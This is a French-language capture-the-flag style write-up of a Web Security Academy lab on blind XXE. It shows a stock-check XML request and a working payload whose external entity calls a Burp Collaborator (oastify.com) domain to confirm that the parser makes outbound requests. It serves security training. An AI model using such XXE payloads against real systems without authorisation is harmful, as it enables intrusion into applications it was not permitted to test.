XXE aveugle avec interaction out-of-band

Blind XXE with out-of-band interaction

Lab: Blind XXE with out-of-band interaction | Web Security AcademyWebSecAcademy

La fonctionnalité Check stock accepte un XML mais n'affiche pas la réponse. Il s'agit d'un XXE aveugle : on ne voit pas directement le contenu renvoyé par le parser. Pour détecter et exploiter la vulnérabilité, on provoque des interactions hors-bande (OOB) — par exemple un lookup DNS ou une requête HTTP vers un domaine contrôlé (Burp Collaborator / OAST) — afin d'observer si le parser effectue des requêtes externes.

<?xml version="1.0" encoding="UTF-8"?>
<stockCheck>
  <productId>
    test
  </productId>
  <storeId>
    1
  </storeId>
  </stockCheck>

Si on soumet ce XML, on n'obtient aucune réponse affichée dans l'interface (comportement aveugle).

Exploitation avec entité externe vers Burp Collaborator

Déclarer une entité externe pointant vers un domaine contrôlé (ici : h4m66g65x80x7bwj3ueflms990fr3hr6.oastify.com) pour forcer le parser à effectuer une requête HTTP/DNS — si la requête arrive sur le service OOB, l'application est vulnérable au XXE aveugle.

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE foo [<!ENTITY myFile SYSTEM "https://h4m66g65x80x7bwj3ueflms990fr3hr6.oastify.com">]>

<stockCheck>

  <productId>

    &myFile;

  </productId>

  <storeId>

    1

  </storeId>

  </stockCheck>

Après l'envoi, on constate la réception de la requête sur le service OOB (Burp Collaborato) qui confirme la présence d'un XXE aveugle avec interaction hors-bande.

Mis à jour il y a 3 mois

hashtagBlind XXE with out-of-band interaction

hashtagExploitation avec entité externe vers Burp Collaborator

Blind XXE with out-of-band interaction

Exploitation avec entité externe vers Burp Collaborator